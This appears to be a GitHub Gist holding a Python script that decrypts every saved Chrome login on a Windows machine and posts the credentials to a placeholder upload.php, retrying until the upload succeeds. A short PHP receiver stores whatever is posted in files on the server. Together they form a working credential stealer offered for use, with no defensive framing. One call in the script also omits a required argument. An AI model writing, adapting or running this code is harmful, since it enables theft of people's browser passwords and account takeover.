Last active
March 21, 2022 08:31
-
-
Save AliMilani/d8ddbe45fe02b3321aae101f56670e9c to your computer and use it in GitHub Desktop.
export chrome passwords and upload it
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Please visit ==> https://www.thepythoncode.com/article/extract-chrome-passwords-python | |
# update http://domain.com/upload.php in line 91 | |
# I made small changes to it | |
import os | |
import json | |
import base64 | |
from time import sleep | |
import sqlite3 | |
import win32crypt | |
from Crypto.Cipher import AES | |
import shutil | |
from datetime import time, timezone, datetime, timedelta | |
import requests | |
def get_chrome_datetime(chromedate): | |
"""Return a `datetime.datetime` object from a chrome format datetime | |
Since `chromedate` is formatted as the number of microseconds since January, 1601""" | |
return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) | |
def get_encryption_key(): | |
local_state_path = os.path.join(os.environ["USERPROFILE"], | |
"AppData", "Local", "Google", "Chrome", | |
"User Data", "Local State") | |
with open(local_state_path, "r", encoding="utf-8") as f: | |
local_state = f.read() | |
local_state = json.loads(local_state) | |
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) | |
key = key[5:] | |
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] | |
def decrypt_password(password, key): | |
try: | |
iv = password[3:15] | |
password = password[15:] | |
cipher = AES.new(key, AES.MODE_GCM, iv) | |
return cipher.decrypt(password)[:-16].decode() | |
except: | |
try: | |
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) | |
except: | |
return "" | |
def upload_passwords(passwords,url): | |
try: | |
r = requests.post(url, data={'data': passwords}) | |
if r.status_code == 200: | |
return True | |
else: | |
return False | |
except: | |
return False | |
def main(): | |
key = get_encryption_key() | |
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", | |
"Google", "Chrome", "User Data", "default", "Login Data") | |
filename = "ChromeData.db" | |
shutil.copyfile(db_path, filename) | |
db = sqlite3.connect(filename) | |
cursor = db.cursor() | |
cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") | |
result = '' | |
for row in cursor.fetchall(): | |
origin_url = row[0] | |
action_url = row[1] | |
username = row[2] | |
password = decrypt_password(row[3], key) | |
date_created = row[4] | |
date_last_used = row[5] | |
if username or password: | |
result+=(f"Origin URL: {origin_url}\n") | |
result+=(f"Action URL: {action_url}\n") | |
result+=(f"Username: {username}\n") | |
result+=(f"Password: {password}\n") | |
else: | |
continue | |
if date_created != 86400000000 and date_created: | |
result+=(f"Creation date: {str(get_chrome_datetime(date_created))}\n") | |
if date_last_used != 86400000000 and date_last_used: | |
result+=(f"Last Used: {str(get_chrome_datetime(date_last_used))}\n") | |
result+=("="*50+"\n") | |
cursor.close() | |
db.close() | |
if upload_passwords(result): | |
print("Uploaded successfully") | |
else: | |
while True: | |
if upload_passwords(result,"http://domain.com/upload.php"): | |
print("Uploaded successfully") | |
break | |
else: | |
print("Upload failed. Trying again in 10 seconds") | |
sleep(10) | |
print(result) | |
try: | |
os.remove(filename) | |
except: | |
pass | |
if __name__ == "__main__": | |
main() | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
function save_data($data) { | |
$filename = date("Y-m-d_H-i-s") . rand(1, 1000000) .".txt"; | |
$file = fopen($filename, "w"); | |
fwrite($file, $data); | |
fclose($file); | |
} | |
$target_dir = "uploads/"; | |
save_data($_POST['data']); | |
?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment